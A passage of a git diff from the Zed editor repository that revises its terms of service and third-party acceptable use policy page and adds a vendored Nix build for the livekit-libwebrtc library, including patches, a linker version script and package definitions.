as stated below in the Arbitration provision, and for any claims under Section 15.2 (b), each party irrevocably consents to the exclusive jurisdiction and venue of the state and federal courts located in New Castle County, Delaware, for any action arising out of or relating to these Terms, and waive any objection based on venue or forum non conveniens. ANY CAUSE OF ACTION OR CLAIM CUSTOMER MAY HAVE ARISING OUT OF OR RELATING TO THESE TERMS MUST BE COMMENCED WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION OR CLAIM ACCRUES, OTHERWISE, SUCH CAUSE OF ACTION OR CLAIM IS PERMANENTLY BARRED. -### 11.9. Entire Agreement +### 15.2. Dispute Resolution and Arbitration -This Agreement is the complete and exclusive statement of the mutual understanding of the parties and supersedes and cancels all previous written and oral agreements, communications, and other understandings relating to the subject matter of this Agreement, and all waivers and modifications must be in a writing signed by both parties, except as otherwise provided herein. Any term or provision of this Agreement held to be illegal or unenforceable shall be, to the fullest extent possible, interpreted so as to be construed as valid, but in any event the validity or enforceability of the remainder hereof shall not be affected. +ANY CONTROVERSY OR CLAIM ARISING OUT OF OR RELATING TO THESE TERMS, OR THE BREACH THEREOF, SHALL BE SETTLED BY ARBITRATION AND JUDGMENT ON THE AWARD RENDERED BY THE ARBITRATOR MAY BE ENTERED IN ANY COURT HAVING JURISDICTION THEREOF. IF THERE IS A DISPUTE ABOUT WHETHER THIS ARBITRATION AGREEMENT CAN BE ENFORCED OR APPLIES TO THE DISPUTE, CUSTOMER AND ZED AGREE THAT THE ARBITRATOR WILL DECIDE THAT ISSUE. -**DATE: May 6, 2025** +**a. Opt-Out.** If Customer does not wish to resolve disputes by binding arbitration, Customer may opt out of the provisions of this Section 17.2 (Dispute Resolution and Arbitration) within 30 days after the date that Customer agrees to these Terms by sending an email to [arbitration-opt-out@zed.dev](mailto:arbitration-opt-out@zed.dev) or a letter to Zed Industries, Inc., Attention: Legal Department – Arbitration Opt-Out, 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 that specifies: Customer’s full legal name, the email address associated with Customer’s account on the Service, and a statement that Customer wishes to opt out of arbitration (“**Opt-Out Notice**”). Once Zed receives Customer’s Opt-Out Notice, this Section 15.2 (Dispute Resolution and Arbitration) will be void and any action arising out of these Terms will be resolved as set forth in Section 15.1 (Governing Law). The remaining provisions of these Terms will not be affected by Customer’s Opt-Out Notice. + +**b. Pre-Arbitration Dispute Resolution and Notification.** Prior to initiating an arbitration, Customer and Zed each agree to notify the other party of the dispute and attempt to negotiate an informal resolution to it first. Zed will contact Customer at the email address Customer has provided to Zed; Customer can contact Zed by email at [legal@zed.dev](mailto:legal@zed.dev). If after a good faith effort to negotiate, one party feels the dispute has not and cannot be resolved informally, the party intending to pursue arbitration agrees to notify the other party via email prior to initiating the arbitration. + +**c. Exceptions to Arbitration.** Customer and Zed each agree that the following claims are exceptions to arbitration and will be brought in a judicial proceeding in a court of competent jurisdiction: (i) Any claim related to actual or threatened infringement, misappropriation or violation of a party’s copyrights, trademarks, trade secrets, patents, or other intellectual property rights; or (ii) Any claim seeking emergency injunctive relief based on exigent circumstances (e.g., imminent danger or commission of a crime, hacking, cyber-attack). + +**d. Arbitration Rules.** (1) If Customer is domiciled in the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be settled by arbitration administered by the American Arbitration Association in accordance with its Commercial Arbitration Rules, and judgment on the award rendered by the arbitrator may be entered in any court having jurisdiction thereof. (2) If Customer is domiciled internationally outside the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be determined by arbitration administered by the International Centre for Dispute Resolution in accordance with its International Arbitration Rules. + +**e. Modification to AAA Rules - Arbitration Hearing/Location.** Customer agrees that any required arbitration hearing will be conducted in the English language by one (1) mutually agreed upon arbitrator, (a) in city/county and state of Customer’s headquarters unless both parties agree otherwise; and appearances may be made via telephonic or video hearing; and (b) for any claim or counterclaim under $25,000, by solely the submission of documents to the arbitrator. + +### 15.3. Waiver of Jury Trial and Class Action Waiver + +EACH PARTY HEREBY IRREVOCABLY WAIVES ALL RIGHT TO TRIAL BY JURY IN ANY ACTION, SUIT, PROCEEDING, CLAIM, OR COUNTERCLAIM ARISING OUT OF OR RELATING TO THESE TERMS. CUSTOMER AND ZED EACH AGREE THAT ANY SUIT, PROCEEDING, OR OTHER ACTION ARISING OUT OF OR RELATED TO THESE TERMS WILL BE CONDUCTED ONLY ON AN INDIVIDUAL BASIS AND NOT IN A CLASS, CONSOLIDATED OR REPRESENTATIVE ACTION. + +## 16. General Terms + +### 16.1. + +These Terms, including the Privacy Policy and any other agreements expressly incorporated by reference into these Terms, are the entire and exclusive understanding and agreement between Customer and Zed regarding your use of the Service. Customer may not assign or transfer these Terms or its rights under these Terms, in whole or in part, by operation of law or otherwise, without Zed’s prior written consent. Zed may assign these Terms and all rights granted under these Terms at any time without notice or consent. The failure to require performance of any provision will not affect Zed’s right to require performance at any other time after that, nor will a waiver by Zed of any breach or default of these Terms, or any provision of these Terms, be a waiver of any subsequent breach or default or a waiver of the provision itself. Use of Section headers in these Terms are for convenience only and will not have any impact on the interpretation of any provision. Throughout these Terms the use of the word “including” means “including but not limited to.” If any part of these Terms are held to be invalid or unenforceable, then the unenforceable part will be given effect to the greatest extent possible, and the remaining parts will remain in full force and effect. + +### 16.2. Notices + +Except as set out in the Terms, any notice or consent under the Terms must be in writing to the Customer email address on the Order and Customer shall send all notices to Zed at Zed Industries, Inc., 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to [legal@zed.dev](mailto:legal@zed.dev) and will be deemed given: (a) upon receipt if by personal delivery; (b) upon receipt if by certified or registered U.S. mail (return receipt requested); or (c) one day after dispatch if by a commercial overnight delivery service. Either Party may update its address with notice to the other Party pursuant to this Section. Zed may also send operational notices to Customer by email or through the Service. + +### 16.3. DPA + +The terms of the Data Processing Agreement (“**DPA**”), available upon request, are incorporated into these Terms by reference. + +### 16.4. Modification of Terms + +Zed may, from time to time, change these Terms. Please check these Terms periodically for changes. Revisions will be effective immediately except that, for existing users, material revisions will be effective 30 days after posting or notice to Customer of the revisions unless otherwise stated. Zed may require that Customer accept modified Terms in order to continue to use the Service. If Customer does not agree to the modified Terms, then Customer should discontinue its use of the Service and notify Zed at hi@zed.dev, in which case Zed will provide a pro-rated refund of any prepaid Subscription Fee. The terms in any Customer purchase order or business form will not amend or modify the Terms and are expressly rejected by Zed; any of these Customer documents are for administrative purposes only and have no legal effect with respect to the Terms. + +### 16.5. Subcontractors + +Zed may use subcontractors and permit them to exercise Zed’s rights, but Zed remains responsible for their compliance with the Terms and for its overall performance under the Terms. + +### 16.6. Independent Contractors + +The Parties are independent contractors, not agents, partners, or joint venturers. + +### 16.7. Export + +Customer will comply with all relevant U.S. and foreign export and import Laws in using the Service. Customer: (a) represents and warrants that it is not listed on any U.S. government list of prohibited or restricted parties or located in (or a national of) a country that is subject to a U.S. government embargo or that has been designated by the U.S. government as a “terrorist supporting” country; (b) agrees not to access or use the Service in violation of any U.S. export embargo, prohibition, or restriction; and (c) will not submit to the Service any information controlled under the U.S. International Traffic in Arms Regulations. + +### 16.8. Government End-Users + +Elements of the Service may include commercial computer software. If the user or licensee of the Service is an agency, department, or other entity of the United States Government, the use, duplication, reproduction, release, modification, disclosure, or transfer of the Service or any related documentation of any kind, including technical data and manuals, is restricted by the terms of the Terms in accordance with Federal Acquisition Regulation 12.212 for civilian purposes and Defense Federal Acquisition Regulation Supplement 227.7202 for military purposes. The Service was developed fully at private expense. All other use is prohibited. + +### 16.9. Privacy Policy + +Please read the [Zed Privacy Policy](/privacy-policy) (the “**Privacy Policy**”) carefully for information relating to our collection, use, storage, and disclosure of your personal information. The Zed Privacy Policy is incorporated by this reference into, and made a part of, these Terms. + +### 16.10. Additional Terms + +Customer’s use of the Service is subject to all additional terms, policies, rules, or guidelines applicable to the Service or certain features of the Service that we may post on or link to from the Service (the “**Additional Terms**”). All Additional Terms are incorporated by this reference into, and made a part of, these Terms. + +### 16.11. Consent to Electronic Communications + +By using the Service, Customer consents to receiving certain electronic communications from Zed as further described in the Privacy Policy. Please read the Privacy Policy to learn more about Zed’s electronic communications practices. Customer agrees that any notices, agreements, disclosures, or other communications that Zed sends to Customer electronically will satisfy any legal communication requirements, including that those communications be in writing. Zed may send Customer emails concerning Zed products and services, as well as those of third parties. Customer may opt out of promotional emails by following the unsubscribe instructions in the promotional email itself. + +### 16.12. Contact Information + +The Service is offered by Zed Industries, Inc. Customer may contact Zed by sending correspondence to 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to [legal@zed.dev](mailto:legal@zed.dev). + +### 16.13. Notice to California Residents + +If Customer is a California resident, then under California Civil Code Section 1789.3, Customer may contact the Complaint Assistance Unit of the Division of Consumer Services of the California Department of Consumer Affairs in writing at 1625 N. Market Blvd., Suite N 112, Sacramento, California 95834, or by telephone at +1-800-952-5210 in order to resolve a complaint regarding the Service or to receive further information regarding use of the Service. diff --git a/legal/third-party-terms.md b/legal/third-party-terms.md index 4c4a0f6cce319369283c42d68f150699f9c1565c..6d4153d0b4771a5ccb9cca924caae682eece145c 100644 --- a/legal/third-party-terms.md +++ b/legal/third-party-terms.md @@ -1,53 +1,39 @@ --- -title: 3rd Party Terms -slug: third-party-terms +title: Acceptable Use Policies +slug: acceptable-use-policies --- -In addition to the [Zed End User Terms](/terms) and [Zed Privacy Policy](/privacy-policy) usage of certain Zed features may also subject you to additional 3rd party terms and conditions. These terms and conditions may include, but are not limited to, the following: +**Last Updated:** March 2, 2026 -## Anthropic - -- [Anthropic Usage Policy](https://www.anthropic.com/legal/aup) -- [Anthropic Privacy Policy](https://www.anthropic.com/legal/privacy) -- [Anthropic Commercial Terms of Service](https://www.anthropic.com/legal/commercial-terms) +Some third-party services accessible through Zed have their own acceptable use policies. These apply whether Zed hosts the service on your behalf or you connect your own account. The applicable policies are listed below and apply alongside the [Zed End User Terms](/terms) and [Zed Privacy Policy](/privacy-policy). -## Baseten +These policies may be updated from time to time by the applicable provider. -- [BaseTen Terms and Conditions](https://www.baseten.co/terms-and-conditions/) - -### Exa.ai +## Anthropic -- [Exa Labs Terms and Conditions](https://exa.ai/assets/Exa_Labs_Terms_of_Service.pdf) -- [Exa Labs Privacy Policy](https://exa.ai/privacy-policy) +- [Anthropic Usage Policy](https://www.anthropic.com/legal/aup) ## GitHub -- [GitHub Terms of Service](https://docs.github.com/en/site-policy/github-terms/github-terms-of-service) -- [GitHub Privacy Statement](https://docs.github.com/en/site-policy/privacy-policies/github-general-privacy-statement) - [GitHub Acceptable Use Policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies) - [GitHub Copilot Product Specific Terms](https://github.com/customer-terms/github-copilot-product-specific-terms) ## Google -- [Google APIs Terms of Service](https://developers.google.com/terms) -- [Google Gemini API Additional Terms of Service](https://ai.google.dev/gemini-api/terms) - [Google Generative AI Prohibited Use Policy](https://policies.google.com/terms/generative-ai/use-policy) -## LiveKit +## OpenAI + +- [OpenAI Usage Policies](https://openai.com/policies/usage-policies/) -- [LiveKit Terms of Service](https://livekit.io/legal/terms-of-service) -- [LiveKit Privacy Policy](https://livekit.io/legal/privacy-policy) +## OpenRouter -## OpenAI +- [OpenRouter Terms of Service](https://openrouter.ai/terms) -- [OpenAI Terms of Use](https://openai.com/policies/terms-of-use/) -- [OpenAI Privacy Policy](https://openai.com/policies/privacy-policy/) -- [OpenAI Business terms](https://openai.com/policies/business-terms/) -- [OpenAI Service terms](https://openai.com/policies/service-terms/) +## Vercel -## SuperMaven +- [Vercel Acceptable Use Policy](https://vercel.com/legal/acceptable-use-policy) -- [SuperMaven Terms of Service](https://supermaven.com/terms-of-service) -- [SuperMaven Privacy Policy](https://supermaven.com/privacy-policy) +## xAI -**DATE: May 6, 2025** +- [xAI Acceptable Use Policy](https://x.ai/legal/acceptable-use-policy) diff --git a/nix/build.nix b/nix/build.nix index 28031337da6877cebda056e9cf2eab0f8f0d3ff7..2f283f83a4d8b215d12933178f1e9b3b33617067 100644 --- a/nix/build.nix +++ b/nix/build.nix @@ -1,4 +1,6 @@ { + pkgs, + system, lib, stdenv, @@ -24,10 +26,20 @@ fontconfig, freetype, git, + glib, + libdrm, + libgbm, libgit2, libglvnd, + libva, + libxcomposite, + libxdamage, + libxext, + libxfixes, libxkbcommon, - livekit-libwebrtc, + libxrandr, + libx11, + libxcb, nodejs_22, openssl, perl, @@ -42,6 +54,7 @@ withGLES ? false, profile ? "release", + commitSha ? null, }: assert withGLES -> stdenv.hostPlatform.isLinux; let @@ -74,7 +87,10 @@ let in rec { pname = "zed-editor"; - version = zedCargoLock.package.version + "-nightly"; + version = + zedCargoLock.package.version + + "-nightly" + + lib.optionalString (commitSha != null) "+${builtins.substring 0 7 commitSha}"; src = builtins.path { path = ../.; filter = mkIncludeFilter ../.; @@ -161,11 +177,22 @@ let ] ++ lib.optionals stdenv'.hostPlatform.isLinux [ alsa-lib + glib + libva libxkbcommon wayland gpu-lib - xorg.libX11 - xorg.libxcb + libglvnd + libx11 + libxcb + libdrm + libgbm + libva + libxcomposite + libxdamage + libxext + libxfixes + libxrandr ] ++ lib.optionals stdenv'.hostPlatform.isDarwin [ apple-sdk_15 @@ -200,7 +227,8 @@ let }; ZED_UPDATE_EXPLANATION = "Zed has been installed using Nix. Auto-updates have thus been disabled."; RELEASE_VERSION = version; - LK_CUSTOM_WEBRTC = livekit-libwebrtc; + ZED_COMMIT_SHA = lib.optionalString (commitSha != null) "${commitSha}"; + LK_CUSTOM_WEBRTC = pkgs.callPackage ./livekit-libwebrtc/package.nix { }; PROTOC = "${protobuf}/bin/protoc"; CARGO_PROFILE = profile; @@ -213,6 +241,7 @@ let lib.makeLibraryPath [ gpu-lib wayland + libva ] }"; @@ -244,6 +273,16 @@ let postPatch = '' substituteInPlace webrtc-sys/build.rs --replace-fail \ "cargo:rustc-link-lib=static=webrtc" "cargo:rustc-link-lib=dylib=webrtc" + + substituteInPlace webrtc-sys/build.rs --replace-fail \ + 'add_gio_headers(&mut builder);' \ + 'for lib_name in ["glib-2.0", "gio-2.0"] { + if let Ok(lib) = pkg_config::Config::new().cargo_metadata(false).probe(lib_name) { + for path in lib.include_paths { + builder.include(&path); + } + } + }' '' + lib.optionalString withGLES '' cat ${glesConfig} >> .cargo/config/config.toml diff --git a/nix/livekit-libwebrtc/0001-shared-libraries.patch b/nix/livekit-libwebrtc/0001-shared-libraries.patch new file mode 100644 index 0000000000000000000000000000000000000000..2a7fcf0cbdd519d51d9df446d5b9db00b22d521e --- /dev/null +++ b/nix/livekit-libwebrtc/0001-shared-libraries.patch @@ -0,0 +1,17 @@ +--- a/BUILD.gn ++++ b/BUILD.gn +@@ -143,8 +143,12 @@ + # target_defaults and direct_dependent_settings. + config("common_inherited_config") { + defines = [ "PROTOBUF_ENABLE_DEBUG_LOGGING_MAY_LEAK_PII=0" ] +- cflags = [] +- ldflags = [] ++ cflags = [ "-fvisibility=default" ] ++ ldflags = [ "-lavutil", "-lavformat", "-lavcodec" ] ++ ++ if (is_linux) { ++ ldflags += [ "-Wl,--version-script=" + rebase_path("//libwebrtc.version", root_build_dir) ] ++ } + + if (rtc_objc_prefix != "") { + defines += [ "RTC_OBJC_TYPE_PREFIX=${rtc_objc_prefix}" ] diff --git a/nix/livekit-libwebrtc/README.md b/nix/livekit-libwebrtc/README.md new file mode 100644 index 0000000000000000000000000000000000000000..87d4fc5599fa0a3b50f853ad53f19e90c5c2121e --- /dev/null +++ b/nix/livekit-libwebrtc/README.md @@ -0,0 +1,7 @@ +# Vendored livekit-libwebrtc build + +The contents of this directory is vendored from [this nixpkgs +PR](https://github.com/NixOS/nixpkgs/pull/478907). + +It should be removed as soon as said PR is merged and the new version of libwebrtc hits +nixpkgs-unstable. diff --git a/nix/livekit-libwebrtc/chromium-129-rust.patch b/nix/livekit-libwebrtc/chromium-129-rust.patch new file mode 100644 index 0000000000000000000000000000000000000000..1fe0c7f87324d8a046ae5226ccfbb06aa42d30b1 --- /dev/null +++ b/nix/livekit-libwebrtc/chromium-129-rust.patch @@ -0,0 +1,21 @@ +diff --git a/build/config/compiler/BUILD.gn b/build/config/compiler/BUILD.gn +index 45086d6838cac..81132ad8ecb31 100644 +--- a/build/config/compiler/BUILD.gn ++++ b/build/config/compiler/BUILD.gn +@@ -1727,16 +1727,6 @@ config("runtime_library") { + configs += [ "//build/config/c++:runtime_library" ] + } + +- # Rust and C++ both provide intrinsics for LLVM to call for math operations. We +- # want to use the C++ intrinsics, not the ones in the Rust compiler_builtins +- # library. The Rust symbols are marked as weak, so that they can be replaced by +- # the C++ symbols. This config ensures the C++ symbols exist and are strong in +- # order to cause that replacement to occur by explicitly linking in clang's +- # compiler-rt library. +- if (is_clang && !is_nacl && !is_cronet_build) { +- configs += [ "//build/config/clang:compiler_builtins" ] +- } +- + # TODO(crbug.com/40570904): Come up with a better name for is POSIX + Fuchsia + # configuration. + if (is_posix || is_fuchsia) { diff --git a/nix/livekit-libwebrtc/libwebrtc.version b/nix/livekit-libwebrtc/libwebrtc.version new file mode 100644 index 0000000000000000000000000000000000000000..abf9d5b9df61640d4775e2e1aeea6f113954a944 --- /dev/null +++ b/nix/livekit-libwebrtc/libwebrtc.version @@ -0,0 +1,22 @@ +/* Linker version script for libwebrtc.so (Linux only). + * + * When libwebrtc.so is built with rtc_use_pipewire=true and + * -fvisibility=default, PipeWire lazy-load trampoline stubs (pw_*, spa_*) + * are exported as weak symbols. If the PipeWire ALSA plugin + * (libasound_module_pcm_pipewire.so) is later dlopen'd by libasound, + * the dynamic linker may resolve the plugin's pw_* references through + * libwebrtc.so's broken trampolines instead of the real libpipewire.so, + * causing a SIGSEGV (NULL function pointer dereference). + * + * This script hides only those third-party symbol namespaces while + * keeping every WebRTC / BoringSSL / internal symbol exported (which + * the Rust webrtc-sys bindings require). + */ +{ + global: + *; + + local: + pw_*; + spa_*; +}; diff --git a/nix/livekit-libwebrtc/mkSystemLibraries.nix b/nix/livekit-libwebrtc/mkSystemLibraries.nix new file mode 100644 index 0000000000000000000000000000000000000000..4293798faf9031ddc80f6c2a9e70a34b6fd56d62 --- /dev/null +++ b/nix/livekit-libwebrtc/mkSystemLibraries.nix @@ -0,0 +1,64 @@ +{ + brotli, + fontconfig, + freetype, + harfbuzz, + icu, + jsoncpp, + libpng, + libwebp, + libxml2, + libxslt, + minizip, + ffmpeg_6, +}: +{ + "brotli" = { + package = brotli; + path = "third_party/brotli/BUILD.gn"; + }; + "fontconfig" = { + package = fontconfig; + path = "third_party/fontconfig/BUILD.gn"; + }; + "freetype" = { + package = freetype; + path = "build/config/freetype/freetype.gni"; + }; + "harfbuzz-ng" = { + package = harfbuzz; + path = "third_party/harfbuzz-ng/harfbuzz.gni"; + }; + "jsoncpp" = { + package = jsoncpp; + path = "third_party/jsoncpp/BUILD.gn"; + }; + "icu" = { + package = icu; + path = "third_party/icu/BUILD.gn"; + }; + "libpng" = { + package = libpng; + path = "third_party/libpng/BUILD.gn"; + }; + "libwebp" = { + package = libwebp; + path = "third_party/libwebp/BUILD.gn"; + }; + "libxml" = { + package = libxml2; + path = "third_party/libxml/BUILD.gn"; + }; + "libxslt" = { + package = libxslt; + path = "third_party/libxslt/BUILD.gn"; + }; + "zlib" = { + package = minizip; + path = "third_party/zlib/BUILD.gn"; + }; + "ffmpeg" = { + package = ffmpeg_6; + path = "third_party/ffmpeg/BUILD.gn"; + }; +} diff --git a/nix/livekit-libwebrtc/package.nix b/nix/livekit-libwebrtc/package.nix new file mode 100644 index 0000000000000000000000000000000000000000..2a07f5c2170e2db00eb1547b2b820e015f8683ff --- /dev/null +++ b/nix/livekit-libwebrtc/package.nix @@ -0,0 +1,353 @@ +{ + stdenv, + clang, + gclient2nix, + lib, + gn, + fetchurl, + fetchpatch, + xcbuild, + python3, + ninja, + git, + cpio, + pkg-config, + glib, + alsa-lib, + pulseaudio, + nasm, + brotli, + fontconfig, + freetype, + harfbuzz, + icu, + jsoncpp, + libpng, + libwebp, + libxml2, + libxslt, + minizip, + ffmpeg_6, + libepoxy, + libgbm, + libGL, + libxcomposite, + libxdamage, + libxext, + libxfixes, + libxrandr, + libxtst, + libx11, + libxi, + pipewire, + xorg, +}: +let + platformMap = { + "x86_64" = "x64"; + "i686" = "x86"; + "arm" = "arm"; + "aarch64" = "arm64"; + }; + cpuName = stdenv.hostPlatform.parsed.cpu.name; + gnArch = platformMap."${cpuName}" or (throw "unsupported arch ${cpuName}"); + gnOs = + if stdenv.hostPlatform.isLinux then + "linux" + else if stdenv.hostPlatform.isDarwin then + "mac" + else + throw "unknown platform ${stdenv.hostPlatform.config}"; + boringSslSymbols = fetchurl { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/refs/tags/webrtc-dac8015-6/webrtc-sys/libwebrtc/boringssl_prefix_symbols.txt"; + hash = "sha256-dAweArv8zjsFPENEKi9mNBQkt4y+hh3rCqG6QZjRC20="; + }; + gnSystemLibraries = import ./mkSystemLibraries.nix { + inherit + brotli + fontconfig + freetype + harfbuzz + icu + jsoncpp + libpng + libwebp + libxml2 + libxslt + minizip + ffmpeg_6 + ; + }; +in +stdenv.mkDerivation { + pname = "livekit-libwebrtc"; + version = "137-unstable-2025-11-24"; + + # libwebrtc loads libEGL/libGL at runtime via dlopen() in the Wayland + # screencast path, so they are not visible as ordinary DT_NEEDED edges. + # Keep an explicit rpath so the shared object can resolve them at runtime. + NIX_LDFLAGS = lib.optionalString stdenv.hostPlatform.isLinux + "-rpath ${lib.makeLibraryPath [ libGL ]}"; + + # Prevent fixup from stripping the rpath above as "unused". + dontPatchELF = stdenv.hostPlatform.isLinux; + + gclientDeps = gclient2nix.importGclientDeps ./sources.json; + sourceRoot = "src"; + + patches = [ + # Adds missing dependencies to generated LICENSE + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/add_licenses.patch"; + hash = "sha256-9A4KyRW1K3eoQxsTbPX0vOnj66TCs2Fxjpsu5wO8mGI="; + }) + # Fixes the certificate chain, required for Let's Encrypt certs + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/ssl_verify_callback_with_native_handle.patch"; + hash = "sha256-RBvRcJzoKItpEbqpe07YZe1D1ZVGS12EnDSISldGy+0="; + }) + # Adds dependencies and features required by livekit + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/add_deps.patch"; + hash = "sha256-DwRtGdU5sppmiFsVuyhJoVCQrRl5JFmZJfxgUPhYXBg="; + }) + # Fix gcc-related errors + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/force_gcc.patch"; + hash = "sha256-1d73Pi1HkbunjYvp1NskUNE4xXbCmnh++rC6NrCJHbY="; + stripLen = 1; + extraPrefix = "build/"; + }) + # fix a gcc-related dav1d compile option + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/david_disable_gun_source_macro.patch"; + hash = "sha256-RCZpeeSQHaxkL3dY2oFFXDjYeU0KHw7idQFONGge8+0="; + stripLen = 1; + extraPrefix = "third_party/"; + }) + # Required for dynamically linking to ffmpeg libraries, exposing symbols, + # and hiding PipeWire symbols via version script (Linux only) to prevent + # SIGSEGV when ALSA's PipeWire plugin is loaded. + ./0001-shared-libraries.patch + # Borrow a patch from chromium to prevent a build failure due to missing libclang libraries + ./chromium-129-rust.patch + ]; + + postPatch = '' + substituteInPlace .gn \ + --replace-fail "vpython3" "python3" + + substituteInPlace tools/generate_shim_headers/generate_shim_headers.py \ + --replace-fail "OFFICIAL_BUILD" "GOOGLE_CHROME_BUILD" + + substituteInPlace BUILD.gn \ + --replace-fail "rtc_static_library" "rtc_shared_library" \ + --replace-fail "complete_static_lib = true" "" + + substituteInPlace webrtc.gni \ + --replace-fail "!build_with_chromium && is_component_build" "false" + + substituteInPlace rtc_tools/BUILD.gn \ + --replace-fail "\":frame_analyzer\"," "" + + for lib in ${toString (builtins.attrNames gnSystemLibraries)}; do + if [ -d "third_party/$lib" ]; then + find "third_party/$lib" -type f \ + \! -path "third_party/$lib/chromium/*" \ + \! -path "third_party/$lib/google/*" \ + \! -path "third_party/harfbuzz-ng/utils/hb_scoped.h" \ + \! -regex '.*\.\(gn\|gni\|isolate\)' \ + \! -name 'LICENSE*' \ + \! -name 'COPYING*' \ + -delete + fi + done + + # Trick the update_rust.py script into thinking we have *this specific* rust available. + # It isn't actually needed for the libwebrtc build, but GN will fail if it isn't there. + mkdir -p third_party/rust-toolchain + (python3 tools/rust/update_rust.py --print-package-version || true) \ + | head -n 1 \ + | sed 's/.* expected Rust version is \([^ ]*\) .*/rustc 1.0 1234 (\1 chromium)/' \ + > third_party/rust-toolchain/VERSION + '' + + lib.optionalString stdenv.hostPlatform.isLinux '' + mkdir -p buildtools/linux64 + ln -sf ${lib.getExe gn} buildtools/linux64/gn + cp ${./libwebrtc.version} libwebrtc.version + substituteInPlace build/toolchain/linux/BUILD.gn \ + --replace 'toolprefix = "aarch64-linux-gnu-"' 'toolprefix = ""' + '' + + lib.optionalString stdenv.hostPlatform.isDarwin '' + mkdir -p buildtools/mac + ln -sf ${lib.getExe gn} buildtools/mac/gn + chmod +x build/toolchain/apple/linker_driver.py + patchShebangs build/toolchain/apple/linker_driver.py + substituteInPlace build/toolchain/apple/toolchain.gni --replace-fail "/bin/cp -Rc" "cp -a" + ''; + + outputs = [ + "dev" + "out" + ]; + + nativeBuildInputs = + (builtins.concatLists ( + lib.mapAttrsToList ( + _: library: if (library.package ? dev) then [ library.package.dev ] else [ ] + ) gnSystemLibraries + )) + ++ [ + gclient2nix.gclientUnpackHook + gn + (python3.withPackages (ps: [ ps.setuptools ])) + ninja + git + cpio + pkg-config + ] + ++ lib.optionals stdenv.hostPlatform.isDarwin [ xcbuild ]; + + buildInputs = [ + nasm + ] + ++ (lib.mapAttrsToList (_: library: library.package) gnSystemLibraries) + ++ (lib.optionals stdenv.hostPlatform.isLinux [ + glib + alsa-lib + pulseaudio + libepoxy + libgbm + libGL + libxcomposite + libxdamage + libxext + libxfixes + libxrandr + libxtst + pipewire + libx11 + libxi + ]); + + preConfigure = '' + echo "generate_location_tags = true" >> build/config/gclient_args.gni + echo "0" > build/util/LASTCHANGE.committime + + python build/linux/unbundle/replace_gn_files.py \ + --system-libraries ${toString (builtins.attrNames gnSystemLibraries)} + ''; + + gnFlags = [ + "is_debug=false" + "rtc_include_tests=false" + ''target_os="${gnOs}"'' + ''target_cpu="${gnArch}"'' + "treat_warnings_as_errors=false" + "rtc_enable_protobuf=false" + "rtc_include_tests=false" + "rtc_build_examples=false" + "rtc_build_tools=false" + "rtc_libvpx_build_vp9=true" + "enable_libaom=true" + "use_dummy_lastchange=true" + "is_component_build=true" + "enable_stripping=true" + "rtc_use_h264=true" + "rtc_use_h265=true" + "use_custom_libcxx=false" + "use_rtti=true" + ] + ++ (lib.optionals stdenv.hostPlatform.isLinux [ + "rtc_use_pipewire=true" + "symbol_level=0" + "enable_iterator_debugging=false" + "rtc_use_x11=true" + "use_sysroot=false" + "use_custom_libcxx_for_host=false" + "use_libcxx_modules=false" + "use_llvm_libatomic=false" + "is_clang=false" + ]) + ++ (lib.optionals stdenv.hostPlatform.isDarwin [ + ''mac_deployment_target="${stdenv.hostPlatform.darwinMinVersion}"'' + "rtc_enable_symbol_export=true" + "rtc_enable_objc_symbol_export=true" + "rtc_include_dav1d_in_internal_decoder_factory=true" + "clang_use_chrome_plugins=false" + "use_lld=false" + ''clang_base_path="${clang}"'' + ]); + + ninjaFlags = [ + ":default" + ] + ++ lib.optionals stdenv.hostPlatform.isDarwin [ + "api/audio_codecs:builtin_audio_decoder_factory" + "api/task_queue:default_task_queue_factory" + "sdk:native_api" + "sdk:default_codec_factory_objc" + "pc:peer_connection" + "sdk:videocapture_objc" + "sdk:mac_framework_objc" + "desktop_capture_objc" + ]; + + postBuild = + lib.optionalString stdenv.hostPlatform.isLinux '' + objcopy --redefine-syms="${boringSslSymbols}" "libwebrtc.so" + '' + + '' + # Generate licenses + python3 "../../tools_webrtc/libs/generate_licenses.py" \ + --target ${if stdenv.hostPlatform.isDarwin then ":webrtc" else ":default"} $PWD $PWD + ''; + + installPhase = '' + runHook preInstall + + mkdir -p $out/lib + mkdir -p $dev/include + + install -m0644 obj/webrtc.ninja obj/modules/desktop_capture/desktop_capture.ninja args.gn LICENSE.md $dev + + pushd ../.. + find . -name "*.h" -print | cpio -pd $dev/include + find . -name "*.inc" -print | cpio -pd $dev/include + popd + '' + + lib.optionalString stdenv.hostPlatform.isLinux '' + install -m0644 libwebrtc.so libthird_party_boringssl.so $out/lib + '' + + lib.optionalString stdenv.hostPlatform.isDarwin '' + install -m0644 WebRTC.framework/Versions/A/WebRTC $out/lib/libwebrtc.dylib + install -m0644 libthird_party_boringssl.dylib $out/lib + '' + + '' + ln -s $out/lib $dev/lib + + runHook postInstall + ''; + + postFixup = lib.optionalString stdenv.hostPlatform.isDarwin '' + boringssl="$out/lib/libthird_party_boringssl.dylib" + webrtc="$out/lib/libwebrtc.dylib" + + install_name_tool -id "$boringssl" "$boringssl" + install_name_tool -id "$webrtc" "$webrtc" + install_name_tool -change @rpath/libthird_party_boringssl.dylib "$boringssl" "$webrtc" + ''; + + passthru.updateScript = ./update.sh; + + meta = { + description = "WebRTC library used by livekit"; + homepage = "https://github.com/livekit/rust-sdks/"; 